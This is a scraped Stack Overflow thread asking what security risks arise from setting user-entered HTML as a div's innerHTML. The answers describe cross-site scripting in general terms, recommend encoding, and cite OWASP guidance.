Let's say I have a <textarea> and <div> element, and when the user puts html, CSS, or whatever they want), into the textarea, then their input is set as the innerHTML of the <div> element, using javascript.

What are the vulnerabilities of letting the user define the content of a <div> element?

Let's say I have a <textarea> and <div> element, and when the user puts html, CSS, or whatever they want), into the textarea, then their input is set as the innerHTML of the <div> element, using javascript.

What are the vulnerabilities of letting the user define the content of a <div> element?

• javascript
• html
• innerhtml

Share Improve this question Follow asked Apr 29, 2011 at 1:56 Web_DesignerWeb_Designer 74.7k9393 gold badges209209 silver badges266266 bronze badges 2

• are you talking about a live preview sort of thing here? – Demian Brecht Commented Apr 29, 2011 at 2:03
• @Demian Yes, the div would render the html as you type. – Web_Designer Commented Apr 29, 2011 at 2:07

Add a ment  | 

4 Answers 4

Sorted by: Reset to default 3

If the content they enter does not leave the page, there is no more risk than them editing the DOM through firebug or the chrome inspector. If you take their input and then display it as is, that is a huge security risk especially when other users are on your website.

Well if you encode the contents so that any javascript that is in there won't execute then it should be safe.

If you don't then a user could upload javascript that would execute the next time another user views that page.

I want to modify my response to take into account @Brigham ments. Escape only works reliably if you are dealing with the the innerHTML of something like a div tab, if you are dealing with using a user generated value as a attribute or within a script tag then escaping/encoding won't work.

I'll refer you to the OWASP XSS guidance (that @Brigham originally brought to my attention) for more information: https://www.owasp/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet#Untrusted_Data

The user can do cross-site scripting. It can inject malicious client-side code

Take a look at http://en.wikipedia/wiki/Cross-site_scripting

Whatever they want could include a <script> tag which pulls a .js file from their own server. Then if you show that content to another user, the script could do all kinds of things to extract information from the unsuspecting user.